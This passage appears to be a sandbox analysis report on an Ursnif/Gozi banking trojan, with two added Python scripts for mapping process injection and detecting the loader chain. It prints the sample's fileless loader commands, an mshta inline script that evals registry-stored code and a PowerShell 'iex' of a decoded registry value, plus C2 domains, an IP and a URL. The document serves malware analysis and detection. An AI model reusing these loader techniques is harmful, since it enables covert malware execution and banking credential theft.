Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 5308
Source: C:\Windows\explorer.exe Thread register set: target process: 3668
Source: C:\Windows\explorer.exe Thread register set: target process: 4376
Source: C:\Windows\explorer.exe Thread register set: target process: 4588
Source: C:\Windows\explorer.exe Thread register set: target process: 4652
Source: C:\Windows\System32\control.exe Thread register set: target process: 3388
Source: C:\Windows\System32\control.exe Thread register set: target process: 5112
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6142312E0
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: EE0000
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6142312E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 10B0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFB736E1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 6E40E00000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFB736E1580
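The injection entries above (memory allocated, memory written, memory protected, thread created, section loaded) each name a source and a target process, and the sample hops through four of them: loaddll32.exe into control.exe, powershell.exe into explorer.exe, explorer.exe into RuntimeBroker.exe, control.exe into explorer.exe. The following Python script is an added example, not part of the Joe Sandbox report, that parses lines in that format into a source-to-target injection graph and grades each edge by whether bytes were delivered and a thread was started. The sample lines are copied in the shape of this section's own entries; the verdict scale (confirmed, probable, partial) is the example's own assumption.

```python
import re
from collections import defaultdict

# Constructed input: lines copied in the shape of this section's
# "Memory allocated/written/protected", "Thread created" and "Section loaded" entries.
REPORT_LINES = [
    r"Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: EE0000 protect: page execute and read and write",
    r"Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6142312E0",
    r"Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFB736E1580",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 736E1580",
    r"Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000 protect: page execute and read and write",
    r"Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FC13560000",
    r"Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 736E1580",
    r"Source: C:\Windows\explorer.exe Thread created: unknown EIP: 736E1580",
    r"Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
]

LINE_RE = re.compile(
    r"^Source: (?P<src>\S+) "
    r"(?P<op>Memory allocated|Memory written|Memory protected|Thread created|Section loaded): "
    r"(?:unknown target: )?(?P<dst>\S+)"
    r"(?: base: (?P<base>[0-9A-Fa-f]+))?"
    r"(?: protect(?:ion)?: (?P<prot>.+))?"
)

WRITE_OPS = {"Memory written", "Section loaded"}   # bytes delivered into the target


def _name(path):
    """Lower-case image name from a full Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def build_edges(lines):
    """Map (source, target) -> {"ops": set of operations, "rwx": bool}.

    Lines whose target the sandbox left as "unknown" cannot be attributed and are
    skipped, so injections into unresolved processes do not show up in the graph.
    """
    edges = defaultdict(lambda: {"ops": set(), "rwx": False})
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m.group("dst") == "unknown":
            continue
        edge = edges[(_name(m.group("src")), _name(m.group("dst")))]
        edge["ops"].add(m.group("op"))
        prot = m.group("prot") or ""
        if "execute" in prot and "write" in prot:
            edge["rwx"] = True                  # RWX allocation or protection change
    return dict(edges)


def classify(edge):
    """Verdict labels are this example's own scale, not the report's."""
    wrote = bool(edge["ops"] & WRITE_OPS)
    ran = "Thread created" in edge["ops"]
    if wrote and ran:
        return "confirmed"   # payload delivered and a remote thread started on it
    if wrote and edge["rwx"]:
        return "probable"    # payload delivered into executable memory, no thread seen
    if wrote or edge["rwx"]:
        return "partial"     # only one half of the write/execute pair observed
    return "none"


def injection_chain(lines):
    """Sorted list of (source, target, verdict) for every pair with some evidence."""
    return sorted(
        (src, dst, classify(edge))
        for (src, dst), edge in build_edges(lines).items()
        if classify(edge) != "none"
    )


def reachable(lines, root):
    """Processes the root reaches through injection edges, in breadth-first order."""
    graph = defaultdict(list)
    for src, dst, _ in injection_chain(lines):
        graph[src].append(dst)
    seen, order, queue = {root}, [], [root]
    while queue:
        cur = queue.pop(0)
        for nxt in graph[cur]:
            if nxt not in seen:
                seen.add(nxt)
                order.append(nxt)
                queue.append(nxt)
    return order


if __name__ == "__main__":
    for src, dst, verdict in injection_chain(REPORT_LINES):
        print(f"{src:>16} -> {dst:<20} {verdict}")
    print("from loaddll32.exe:", " -> ".join(reachable(REPORT_LINES, "loaddll32.exe")))
```

The PID-keyed "Thread register set" entries (thread context modification) are not joined to this graph, so loaddll32.exe -> control.exe grades only as probable here even though the report's own entries show the context change for that pair (target process 5308 is control.exe). Joining those entries needs the PID-to-image map from the process list.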
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\v0ewugxm\v0ewugxm.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES556B.tmp' 'c:\Users\user\AppData\Local\Temp\v0ewugxm\CSC796D60C17DC54E309D26CA9CC0469D24.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES6171.tmp' 'c:\Users\user\AppData\Local\Temp\0oy3xkhb\CSC12D6740B38D4874A9168A78B923F8E.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000023.00000000.419359946.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 00000023.00000000.419762461.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.441895717.000001FC11790000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000023.00000000.433167329.000000000871F000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.441895717.000001FC11790000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000023.00000000.419762461.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.441895717.000001FC11790000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000023.00000000.419762461.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.441895717.000001FC11790000.00000002.00000001.sdmp Binary or memory string: Progmanlock
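The process-creation entries above show the loader chain mshta.exe -> powershell.exe -> csc.exe: mshta.exe evaluates a script read back from HKCU\Software\AppDataLow\Software\Microsoft\<GUID>, powershell.exe decodes a second value from the same key and passes it to iex, and csc.exe compiles source dropped under %TEMP%. The following Python detection is an added example, not from the report or the sandbox vendor, that runs the corresponding checks (the two Sigma titles listed above, plus PowerShell iex-from-registry and the AppDataLow registry path) over constructed process-creation events modelled on those command lines. The shell and folder lists are the example's own assumptions, not the published Sigma rules' exact lists.

```python
import re
from typing import Dict, List

# Assumed lists for this example (not the published Sigma rules' exact lists).
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "regsvr32.exe"}
SUSPICIOUS_SRC_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\users\\public\\")
URSNIF_REG_PATH = "\\appdatalow\\software\\microsoft\\"   # hive location used by this sample
IEX_RE = re.compile(r"\b(iex|invoke-expression)\b")
REG_READ_RE = re.compile(r"\b(gp|get-itemproperty)\b[^)]*\bhk(cu|lm):")

# Constructed process-creation events modelled on this section's "Process created" entries
# (the last two are benign controls). Command lines are not verbatim from the report.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
EVENTS = [
    {"parent": r"C:\Windows\System32\mshta.exe", "image": PS,
     "cmd": r"powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))"},
    {"parent": "unknown", "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\Actidsrv'));if(!window.flag)close()</script>"},
    {"parent": PS, "image": CSC,
     "cmd": r"csc.exe /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\0oy3xkhb\0oy3xkhb.cmdline'"},
    {"parent": PS, "image": CSC,
     "cmd": r"csc.exe /noconfig /fullpaths @'C:\Program Files\Build\app.cmdline'"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS, "cmd": "powershell.exe Get-ChildItem"},
]


def _base(path: str) -> str:
    """Lower-case image name from a full path (or the literal 'unknown')."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(event: Dict[str, str]) -> List[str]:
    """Names of the checks an event trips, in a fixed order."""
    parent, image = _base(event["parent"]), _base(event["image"])
    # JScript/HTA string literals double their backslashes; fold them so path checks match.
    low = event["cmd"].lower().replace("\\\\", "\\")
    hits = []
    if parent == "mshta.exe" and image in SHELLS:
        hits.append("mshta_spawning_shell")
    if image == "mshta.exe" and "about:" in low and "regread(" in low:
        hits.append("mshta_inline_script_reads_registry")
    if image in {"powershell.exe", "pwsh.exe"} and IEX_RE.search(low) and REG_READ_RE.search(low):
        hits.append("powershell_iex_from_registry")
    if image == "csc.exe" and any(d in low for d in SUSPICIOUS_SRC_DIRS):
        hits.append("csc_source_in_suspicious_folder")
    if URSNIF_REG_PATH in low:
        hits.append("ursnif_registry_store_path")
    return hits


def triage(events):
    """(image name, hits) for each event that tripped at least one check, in input order."""
    out = []
    for event in events:
        hits = detect(event)
        if hits:
            out.append((_base(event["image"]), hits))
    return out


if __name__ == "__main__":
    for image, hits in triage(EVENTS):
        print(f"{image:<16} {', '.join(hits)}")
```

The AppDataLow path check is the narrowest of the five and the one most specific to this family; the other four fire on any loader that uses the same mshta/PowerShell/csc pattern. On a real host the events come from Sysmon event ID 1 or Windows security event 4688 with command-line auditing enabled.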

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007704D7 cpuid 0_2_007704D7
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_10001B13
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0077B585 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 0_2_0077B585
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_10001000
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000210F GetUserNameA, 0_2_1000210F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_1000166F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000023.00000003.439971229.00000000032B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264849176.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.430559712.0000016753ED0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265016574.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.441197117.0000000000760000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.424976017.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264996879.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.442622073.0000000000E5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264981928.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264937630.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264962927.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.415711591.000001FE6ECE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.365389043.000000000314B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.264883411.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.265008203.00000000032C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6872, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5308, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5388, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: the same memory dumps and process memory spaces listed under Stealing of Sensitive Information above (identical match list; the Ursnif rule is counted in both categories).
Behavior Graph (ID 340570, sample u.dll, start date 16/01/2021, architecture WINDOWS, score 100)

Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures.

Process tree reconstructed from the graph ("injected" marks a process that received code rather than being started by its parent):

mshta.exe (started)  -- Suspicious powershell command line found
  powershell.exe (started)  -- Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Compiles code for process injection (via .Net compiler); Creates a thread in another existing process (thread injection)
    dropped: C:\Users\user\AppData\...\v0ewugxm.cmdline (UTF-8); C:\Users\user\AppData\Local\...\0oy3xkhb.0.cs (UTF-8)
    explorer.exe (injected)  -- contacts c56.lepini.at; Changes memory attributes in foreign processes to executable or writable; Writes to foreign memory regions; Allocates memory in foreign processes; 4 other signatures
      RuntimeBroker.exe (injected)
    csc.exe (started)  -- dropped C:\Users\user\AppData\Local\...\v0ewugxm.dll (PE32)
      cvtres.exe (started)
    csc.exe (started)  -- dropped C:\Users\user\AppData\Local\...\0oy3xkhb.dll (PE32)
      cvtres.exe (started)
    conhost.exe (started)
loaddll32.exe (started)  -- Detected Gozi e-Banking trojan; Writes to foreign memory regions; Allocates memory in foreign processes; 4 other signatures
  control.exe (started)  -- Changes memory attributes in foreign processes to executable or writable; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
iexplore.exe (started)
  iexplore.exe (started)
  iexplore.exe (started)
  iexplore.exe (started)
iexplore.exe (started)
  iexplore.exe (started)  -- contacts golang.feel500.at (46.173.218.93, ports 49731, 49732, 49744; GARANT-PARK-INTERNETRU, Russian Federation)

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
46.173.218.93 | unknown | Russian Federation | 47196 | GARANT-PARK-INTERNETRU | false

Contacted Domains

Name IP Active
c56.lepini.at 46.173.218.93 true
golang.feel500.at 46.173.218.93 true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://golang.feel500.at/api1/Rce8jxmWhK3ih3/wsPjkBW2_2B3FZFW1K47u/qNMQVVcyjBkgqGo4/EV9w4LVtwT4dZ22/OvqSLxhTQ3_2FvabW_/2FgZB0ja6/5x9Za3_2FQN4ZdUGH6lo/suw50whDv5PhfbDIdeX/T8eQmCtvYhggs3SS3gjEZp/M9FvWod65aEU9/G6avRfSM/LfZoGD4M2GwS3WWXnDZAQsS/VIiOqdfsU1/pU1_2B6cKaXhAnsco/82IM1VR4P9YJ/_2BGT5YwaNg/KNwzb_2F0dky5V/sFXJntfI7YvzRXn9ooIqO/8cWsv_2FMjFm7Qz8/GqjkN8IiVtb8odv/cswSX5yoUMDZAw42Dq/yWZp | false | Avira URL Cloud: safe | unknown
http://golang.feel500.at/favicon.ico | false | Avira URL Cloud: safe | unknown